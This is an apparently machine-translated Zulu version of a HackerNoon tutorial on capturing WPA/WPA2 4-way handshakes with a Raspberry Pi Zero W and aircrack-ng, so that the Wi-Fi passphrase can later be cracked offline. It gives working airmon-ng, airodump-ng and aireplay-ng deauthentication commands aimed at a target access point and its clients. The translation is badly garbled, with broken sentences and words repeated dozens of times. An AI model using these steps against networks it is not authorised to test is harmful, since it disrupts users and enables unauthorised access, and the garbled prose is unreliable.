Ngo-blog yethu eyadlulayo, sinikeza indlela yokufaka i-Raspberry Pi Zero W futhi ukuxhumanisa ku-Remote usebenzisa isixhobo se-mobile. https://hackernoon.com/setting-up-pi-zero-for-pi-fi-hacking?embedable=true 
 
 Imininingwane: Yonke okuzenzakalelayo kule blog iyatholakala ngaphakathi kwezingcele zomthetho kanye nenkqubo ephelele ye-network owner. Le nkqubo yenzelwe ngempumelelo yokufundisa. Umbhali akufanele noma akufanele kokusebenzisa okungagunyaziwe kwezobugcisa ezibonakalayo. Konke okuzenzakalelayo kuleli kwebhulogi kwenziwa ngaphakathi kwezingcele zomthetho kanye nenkqubo ephelele esithathwe ngu-network owner. Lezi zinsizakalo zihlanganisa ngempumelelo. Umbhali akufanele noma ukuthatha impendulo kokusebenzisana kwezobuchwepheshe ezibonakalayo. Disclaimer: Now that we have the power of Linux at our fingertips, bheka ukubonisa WPA handshakes. Kodwa ngaphambi kokuzihlanganisa, siphinde usihlanganisa ngokushesha ... WPA Handshake (4-Way Handshake) I-WPA/WPA2 iyinhlelo zokusetyenziswa kakhulu ye-Wi-Fi security. I-Mechanism yesisekelo yokuboniswa kwe-confidentiality kanye ne-integrity yebhizinisi angaphandle kwe-wireless ku-WPA/WPA2 kuyinto (WPA Handshake), okuyinto I-client kanye ne-access point kanye encryption keys ukuthi Ukuhambisa Data. 4-way handshake authenticates establishes secure Njengoba ibizwa ngokuthi, i-handshake ye-4-way ikakhulukazi Ukubuyekezwa phakathi Ngiya . Handshake kuqala uma amakhasimende kuyimfuneko Waze Ukusuka ku-access point four messages client (supplicant) access point (authenticator) authenticated associated I-Handshake ye-4 Way Usebenzisa izindlu ezivela ku-Exchange Messages. EAPOL (Extensible Authentication Protocol Over LAN) Izinyathelo ezine ezine ezisebenzayo ezisebenzayo ezisebenzayo ezisebenzayo ezisebenzayo ezisebenzayo ezisebenzayo ezisebenzayo ezisebenzayo: PMK (Pairwise Master Key) I-secret eyahlukile esithathwe ngesikhathi sokuqinisekisa. 
 
 
 Ku-WPA2-Personal, i-PMK ikhiqizwa ngqo kusuka ku-Pre-Shared Key (PSK) usebenzisa i-Password-Based Key Derivation Function 2 (PBKDF2). Ku-WPA2-Enterprise, i-PMK iyatholakala ku-Master Session Key (MSK), okuyinto i-client ne-access point ibhaliswe ngesikhathi sokuqinisekisa. I-PTK (I-Pairwise Transient Key) Ukusebenza Kwesimo Ukulungiselela okuhlobene ku-Client-Access point pair futhi isetshenziselwa ukucubungula Ukuhamba phakathi kwe-client ne-access point. unicast It is derived ukusetshenziswa a Nge iziphumo ezilandelayo: Pseudo-Random Function (PRF) PTK = PRF( PMK + Anonce + SNonce + MAC(Access Point) + MAC(Client) ) 
 GMK (Group Master Key) Ukulungiswa lokusebenza ku-access point, futhi akuyithunyelwa ngempumelelo. I-GTK (i-Group Temporal Key) Imininingwane Lezi zincazelo zithunyelwe ku- futhi iyahlaziywa kumakhasimende bonke abahlanganyele ku-access point efanayo. GMK Ukubhalisa Waze Ukuhambisa traffic ngokusebenzisa i-access point kumakhasimende. multicast broadcast Indlela 4 Way Handshake Isebenza Imininingwane yokuqala ye-EAPOL (AP → Client) I-Access Point inikeza i- kumakhasimende, okuyinto isetshenziselwa ukukhipha . ANonce(Authenticator Nonce) PTK (Pairwise Transient Key) I-client iyatholakala ku- Ngiya kanye nokufinyelela kwelanga; ke kuguqulela . PMK (Pairwise Master Key) MAC addresses SNonce (Supplicant Nonce) I-Second EAPOL Message (I-Client → AP) I-Client inikeza i a ukufinyelela ku-Access Point, okuvumela ukufinyelela ku-Access Point Waze Ukubuyekeza ukunakekelwa kwebhizinisi Ukungabonakaliswa ku. SNonce (Supplicant Nonce) MIC (Message Integrity Code) PTK (Pairwise Transient Key). MIC (Message Integrity Code) SNonce Third EAPOL Message (AP → Ikhasimende) I-Access Point inikeza i- ukuze amakhasimende, encrypted usebenzisa GTK (Group Temporal Key) PTK (Pairwise Transient Key). I-EAPOL Message ye-4 (I-Client → AP) I-client inikeza isitimela se-EAPOL ekupheleni ebandayo a Ngena ngemva Ukusebenza okuphumelelayo kwe-Installation of both Waze . MIC acknowledging PTK (Pairwise Transient Key) GTK (Group Temporal Key) Indlela elula ukufumana Kuyinto ukuhlola kanjani abantu ukwakha ukuxhumana. 4-way handshake Konke ukucindezeleka kubuyekeza ulwazi oluphambili okuyinto kusiza abantu abasebenzi ukubonisa ukuthi kukhona futhi ukwakha ukucindezeleka. Ngaphezu kwalokho, i-access point kanye ne-client zihlanganisa izinto eziyinhloko ukuqinisekisa ukuthi zihlanganisa okuhle. futhi angakwazi ukuxhumana ngokushesha. secret (PMK) Uma ukwakhiwa, ukuxhumana okufakiwe kungaseqala, njengomdlavuza yobumfihlo phakathi kwezinye abantu. Nangona kunjalo, kukhona isizukulwane esihle: 
 
 Nokho, wonke umntu angakwazi ukuyifunda imibuzo yakho. Nokho, wonke umntu angakwazi ukuyifunda imibuzo yakho. Ukungcweliswa Imininingwane ye-Wireless , enikeza ukuthi wonke umuntu ku-rack to Ukuhweba Wireless. inherently exposed eavesdrop Phakathi ne-handshake ye-4-way, ama-values ebalulekile (njenge-nonces ne-MAC addresses) zithunyelwe ngaphandle kwe-encrypted, okuvumela ukuchitha okungagunyaziwe. Nokho, idivayisi asikwazi ukuhambisa (i-passphrase) phezu emoyeni. Ngaphandle kwalokho, inikeza 3) Ukusebenzisa Ukusebenza pre-shared key PMK (Pairwise Master Key PBKDF2 Kodwa ngoba Handshake inikeza zonke izicelo ezidingekayo ngaphandle kwe-password, umdlali angakwazi: 
 
 
 
 
 Ukusebenzisa i-dictionary noma i-attack ye-brutal-force ukuhlola ama-password ezininzi Ukuguqulwa kwe-PMK usebenzisa i-PBKDF2 Ukuguqulwa kwe-PTK usebenzisa i-PRF Ukubalwa i-MIC kanye nokuguqulwa ku-MIC eyenziwe. Uma i-MIC ebonakalayo iyahlukaniswa ne-MIC ebonakalayo, umngcipheki wabhala i-passphrase. Ngemuva kokufaka kwama-handshakes e-4-way kanye nokumangaliseka okuhlobene, singakwazi ukuqala ... Ukuhlobisa WPA Handshake Thina usebenzisa , isixhobo ephelele yokuhlola ukhuseleko we-Wi-Fi networks, ukujabulela i-handshakes ye-WPA. aircrack-ng Ukulungiswa 
 
 
 
 
 Qinisekisa ukuthi i-adapter yakho ye-wireless isekelwe ku-monitor mode Ukuxhuma ku-micro-USB port (hhayi-power port) usebenzisa i-OTG cable Qhagamshelana Pi nge-SSH Ukuhlola i-network interface ifconfig
 
 
 Ungasebenzisa ip a uma ifconfig ayikho. Ungasebenzisa ip a uma ifconfig ayikho.       Uyakwazi ukubona izixhumanisi eziningi wireless, ezifana wlan0 Waze wlan1 I-one ngokuvamile iqukethe ibhokisi lwezintambo ye-internal kanye ne-adapter yakho ye-wireless. Nokho, uma unayo kuphela interface eyodwa, sicela ukuxhumanisa umugqa ngokufanele futhi isebenze: lsusb 
 Lokhu kuqinisekisa ukuba i-adapter ifakwe ngokufanele. 
 
 Ukuhlaziywa kwamakhemikhali sudo apt update 
 
 
 Ukufaka Aircrack-ng sudo apt install aircrack-ng 
     Kali futhi Parrot ngokuvamile kuhamba aircrack-ng Pre-installed, kodwa akukho isifo ekusebenzeni lokhu. Ukulungiselela i-Monitor Mode 
 
 Thola i-interface nge-airmon-ng sudo airmon-ng 
 I-command ibonisa ngamunye i-interface kanye ne-driver kanye ne-chipset. 
 
 Ukusebenza kwe-monitor mode nge-airmon-ng sudo airmon-ng start <interface> 
 
 
 
 Uyakwazi ukubonisa umyalezo enikeza ukuthi uqhuba isilawuli sudo airmon-ng check kill 
 Uhlelo le-SSH ikakhulukazi izinhlelo ezinokuthintela imodi ye-monitor, njenge-NetworkManager noma i-wpa_supplicant. Njengoba isixhumanisi lethu ye-SSH ifakwe, kungcono ukugcina isitimela lethu. Uyakwazi ukubonisa umyalezo enikeza ukuthi uqhuba isilawuli sudo airmon-ng check kill 
 Uhlelo le-command ivimbele izinhlelo ezinokuthintela imodi ye-monitor, njenge- noma Uma isixhumanisi yethu ye-SSH iyasebenza, lokhu kungenzeka ukugcina isitimela yethu. NetworkManager wpa_supplicant Ukuhlobisa Handshake 
 
 
 
 Dump all traffic sudo airodump-ng <interface> I-command iyahlekisa i-lista ye-real-time ye-access points ebonakalayo kanye ne-lista ye-clients ebonakalayo (i-stations). Ngaphambi kokuphumelela, sicela uchofoze imiphumela emaphaketheni. Isigaba ephakeme ibonisa idatha ye-access points: : Ikheli le-Mac ye-access point. BSSID : Isisindo se-signal esithunyelwe yi-Wi-Fi adapter noma i-Network Interface. Uma uqhagamshelane aphezulu ku-AP noma isitimela, ukuphakama kwe-signal. PWR : Thola Quality njengesilinganiso se-paket eyenziwe ngempumelelo eminyakeni angu-10 edlule. RXQ : Inani yepakethe zokubuyiswa eziholwe yi-access point. Beacons : Inani yedatha amaphakheji abalandeli. #Data : Inani yepakethe yedatha ngenyanga etholakalayo eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni eminyakeni. #/s : Isivinini eside esithathwe yi-access point. MB : I-algorithm ye-encryption isetshenziselwa, i-OPN ibheka ku-no encryption. ENC : I-cypher ebonakalayo CIPHER : I-authentication protocol eyenziwe. AUTH Imininingwane ye-Name of the Network (SSID) ESSID Isigaba esilandelayo ibonisa idatha ye-client (isikhulumi): : Ikheli le-MAC ye-stations noma ama-stations ezihlangene ezihlangene ne-AP yokuxhumana. Nge-AP has a BSSID of "(hhayi asebenzayo)". STATION associated : Isilinganiso se-receiving ye-station, esilandelayo isilinganiso se-transmission. RATE : Inani lwezipakethi ze-datapackage eyenziwe eminyakeni angu-10 eminyakeni eminyakeni eminyakeni. LOST : Inani yepakethi yedatha eyenziwe ngu-client Notes: Izindaba ezengeziwe mayelana ne-client, njenge-EAPOL noma i-PMKID eyenziwe. Packets : I-ESSID eyenziwe ngu-client. Lezi zihlanganisa i-networks eyayithanda ukuxhumanisa ukuba ifakwe ngokushesha. Probe 
 
 
 
 
 Next, copy the   and channel ( ) of your target access point, as you will need them in the next step. BSSID CH 
 
 Dump traffic from the target access point. Ukuze lokhu, ufake ifayibha entsha ye-terminal ukuze ungahambisa ukusebenza okuqhubekayo isixazululo airodump Faka amaphuzu ezintathu ku-tab futhi chofoza i-duplicate Ukusuka Ukusuka ku Target airodump-ng sudo airodump-ng --bssid <bssid> -c <channel_number> -w <output> <interface>
 Ikheli le-MAC ye-target access point --bssid I-channel ye-target access point -c Ukucacisa ifayela ukucacisa ifayela -w I-command iveza i-access point kanye ne-clients (i-stations) ezihambelana nayo. Njengoba ungacabanga, kune-client eyodwa eyakhelwe ku-target 
 
 Ukukhishwa kwe-handshake ye-4-way (optional) Ngokuvamile, inqubo yokufaka i-handshake ye-WPA kuyinto ; Sishayele i-Wi-Fi traffic ngaphandle kokudlulisela yini, okuyinto i-stealthy kodwa kungabangela ukhangela i-client ukuxhumanisa ngokuzenzakalelayo kanye nokukhuthaza i-handshake ye-4-way. passive Ukusebenza ngokushesha, singakwazi Umthengi we , ukuguqulwa kwe-reconnect kanye ne-4-way handshake usebenzisa i-deauthentication attack. force disconnect Ukuze uthole lokhu, sicela usebenzisa Thumela Izikhwama ku-target aireplay-ng deauth Ukukhishwa kwe-terminal entsha (ukugcina izinsuku ezine ezimbili zokusebenza) aireplay-ng sudo aireplay-ng --deauth 10 -a <target_bssid> <interface> 
 Ukucacisa Ukukhuthaza Alternative, ungasebenzisa Kuyinto alias elihambisanayo Ukukhuthaza --deauth deauth -0 deauth Kuyinto inombolo Izikhwama ezivela 10 deauth Ikheli le-MAC ye-target -a       aireplay-ng Ukuletha amaphakheji deauthentication usebenzisa reason code 7 (Class 3 frame received from non-associated station) Ukusuka ku-Default Ungathola i-client eyodwa usebenzisa i- Flag, okuyinto ukwandisa amathuba yokukhuthaza handshake uma amakhasimende ezininzi zihlala: -c sudo aireplay-ng -0 10 -a <target_ap_mac> -c <client_mac> <interface> 
 
 
 Ukubuyekeza WPA Handshake Ukuguqulwa kwebhizinisi edlule (ukusebenza ku-target access point) airodump-ng       EAPOL Ukusuka Notes indawo ye-client ibonisa ukuthi i-client iyahambisana ne-handshake ye-4-way. Ukuguqulwa kwebhizinisi lokuqala (ukusebenza Ukubuyekezwa airodump-ng Emuva aphakeme, singakwazi ukubona WPA handshake, ukholelwa ukuchitha ngempumelelo WPA handshake. 
 
 Ngo-terminal entsha, sicela ukuthi i-pcap ebonakalayo iqukethe i-handshake ye-WPA usebenzisa i-aircrack-ng. sudo aircrack-ng <captured_file.cap>
 Ukubonisa ukuthi i-handshake ye-WPA iyatholakala, i-aircrack-ng iyathuthukisa ukuhlola isakhiwo se-WPA. Uma i-handshake iyatholakala noma engatholakali, ithi "No valid WPA handshakes found." Kwangathi elilandelayo, singathanda nge cracking the WPA handshake using Hashcat

Walkthroughs, tutorials, guides, and tips. This story will teach you how to do something new or how to do something better.

Read My Stories

Lo msindo ukhiqizwa ngolimi lokuqala lwendaba!

Indlela yokufaka WPA Handshakes nge Raspberry Pi futhi Aircrack-ng

About Author

IMIBONO

HANG TAGS

LESI SIHLOKO SETHULWE NGAPHAKATHI

Related Stories

The Billionaires F*cked Up

Zulu Network: Moving The Bitcoin Economy Forward With a Two-Tiered Bitcoin Layer 2 Architecture

The Billionaires F*cked Up

Zulu Network: Moving The Bitcoin Economy Forward With a Two-Tiered Bitcoin Layer 2 Architecture

Light-Mode

Classic

Newspaper

Minty

Dark-Mode

Neon Noir

Minty

HN StartUps